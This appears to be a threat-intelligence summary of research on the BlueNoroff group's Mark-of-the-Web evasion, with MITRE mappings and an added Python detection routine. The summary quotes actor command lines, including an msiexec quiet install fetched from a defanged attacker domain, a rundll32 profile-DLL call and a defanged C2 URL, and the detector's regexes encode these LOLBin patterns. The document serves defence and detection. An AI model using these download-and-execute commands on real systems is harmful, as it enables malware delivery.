BlueNoroff introduces new methods bypassing MoTW

BlueNoroff group expanded its malware delivery methods to bypass Mark-of-the-Web (MOTW) protections by using ISO and VHD disk image formats, and began experimenting with Visual Basic Script, Windows Batch scripts, and a Windows executable. They also operated a large infrastructure of fake domains impersonating venture capital firms and banks, with a focus on Japanese financial entities and a UAE victim, indicating broad activity and targeted outreach.

Keypoints

  • BlueNoroff introduced new file types to evade Mark-of-the-Web (MOTW) security measures.
  • The group expanded delivery methods to include Visual Basic Script, Windows Batch scripts, and Windows executables.
  • They used LOLBins (living-off-the-land binaries) such as msiexec and rundll32 to execute payloads while evading detection.
  • More than 70 domains were used, with many fake domains imitating venture capital and bank entities; the activity targets include Japanese financial entities.
  • A long-lasting initial infection involved a malicious Word document and a downloader that fetched the next payload, including a UAC bypass (ieinstal.exe).
  • New decoy and archive techniques were observed, such as a ZIP with Password.txt.lnk and Japanese-named decoy content, plus embedded VBScript and HTML Application payloads.
  • Updated methods include additional downloader scripts, RC4-encrypted configuration, and a Windows executable downloader showing a fake password to deceive victims.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Initial intrusion relies on Word documents and shortcut files. “The group usually takes advantage of Word documents and uses shortcut files for the initial intrusion.”
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – They executed several Windows commands to gather basic system information. “they executed several Windows commands to gather basic system information.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Visual Basic Script used as part of the delivery chain. “The actor took advantage of several scripts, including Visual Basic Script and Windows Batch script.”
  • [T1204.001] User Execution: Malicious Link – The additional samples include malicious links activated by user actions, such as shortcut-driven execution. “The Shortcut file named ‘Password.txt.lnk’ … to acquire the decoy password.”
  • [T1204.002] User Execution: Malicious File – Double-clicking a shortcut leads to execution of the next payload. “The command below was executed when the victim double-clicked on the shortcut file:”
  • [T1218.007] System Binary Proxy Execution: Msiexec – The downloader abuses msiexec to silently launch the Windows Installer payload. “msiexec -c /Q /i hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd & timeout”
  • [T1218.011] System Binary Proxy Execution: Rundll32 – The downloader uses rundll32 to execute fetched payload. “rundll32.exe %Profile%update.dll,#1 …”
  • [T1105] Ingress Tool Transfer – The malware fetches the next payload from a remote server. “The fetched payload is supposed to be saved in %Profile%update.dll.”
  • [T1027.002] Obfuscated Files or Information: Software Packing – The configuration is decrypted with RC4; the RC4 key is embedded in the binary. “The malware decrypts the configuration data with the RC4 algorithm using an embedded 64-byte key.”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication and payload delivery over HTTP/HTTPS URLs. “Remote URL: https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=”
  • [T1105] Ingress Tool Transfer (additional) – The malware uses RC4 and URL parameters to fetch payloads in different scenarios, including proxy handling via cURL. “The payload URL was delivered using a command line parameter” (and related cURL usage in updates).
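As an added detection example (not code from the report or from the researchers who published it), the Python routine below applies the msiexec, rundll32 and double-extension shortcut patterns quoted in the Keypoints and MITRE sections to constructed process-creation command lines; the hostnames, paths and event ids are placeholders.

```python
import re

# Added detection example (not from the report). It replays constructed
# process-creation command lines that mirror the quoted LOLBin patterns
# and flags the ones a defender would want to triage.
URL_RE = r'h(?:tt|xx)ps?://'                       # plain or defanged URL
PROFILE_RE = re.compile(r'%(?:user)?profile%|c:\\users\\|%appdata%', re.I)

def check_msiexec(cmd: str) -> bool:
    """T1218.007: msiexec quietly installing a package straight from a URL."""
    if not re.search(r'\bmsiexec(?:\.exe)?\b', cmd, re.I):
        return False
    quiet = re.search(r'(?:^|\s)[/-](?:q|qn|quiet)\b', cmd, re.I)
    remote = re.search(r'(?:^|\s)[/-]i\s+"?' + URL_RE, cmd, re.I)
    return bool(quiet and remote)

def check_rundll32(cmd: str) -> bool:
    """T1218.011: rundll32 loading a DLL from a user-writable profile path
    and calling an export by ordinal (#N), as in '%Profile%update.dll,#1'."""
    if not re.search(r'\brundll32(?:\.exe)?\b', cmd, re.I):
        return False
    return bool(PROFILE_RE.search(cmd) and re.search(r'\.dll\s*,\s*#\d+', cmd))

def check_disguised_lnk(cmd: str) -> bool:
    """Shortcut hiding behind a document extension, e.g. Password.txt.lnk."""
    return bool(re.search(r'\.(?:txt|pdf|docx?|xlsx?)\.lnk\b', cmd, re.I))

RULES = [
    ("T1218.007 msiexec remote quiet install", check_msiexec),
    ("T1218.011 rundll32 profile DLL by ordinal", check_rundll32),
    ("disguised shortcut (.txt.lnk)", check_disguised_lnk),
]

# Constructed sample events; hostnames, paths and ids are placeholders.
SAMPLE_EVENTS = [
    ("evt-1", 'msiexec -c /Q /i hxxps://updates.example[.]test/packageupd.msi?ccop=AbCdEf & timeout'),
    ("evt-2", 'rundll32.exe %Profile%update.dll,#1 placeholder-arg'),
    ("evt-3", r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'),
    ("evt-4", r'msiexec /i C:\Temp\setup.msi /qn'),
    ("evt-5", r'explorer.exe "C:\Users\victim\Downloads\Password.txt.lnk"'),
]

def triage(events):
    """Return (event_id, rule_name) for every event that trips a rule."""
    return [(eid, name) for eid, cmd in events for name, fn in RULES if fn(cmd)]

if __name__ == "__main__":
    for eid, name in triage(SAMPLE_EVENTS):
        print(f"{eid}: {name}")
```

The benign events (a local MSI install and a System32 DLL called by name) are included so the rules can be checked for false positives as well as hits.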

Indicators of Compromise

Read more: https://securelist.com/bluenoroff-methods-bypass-motw/108383/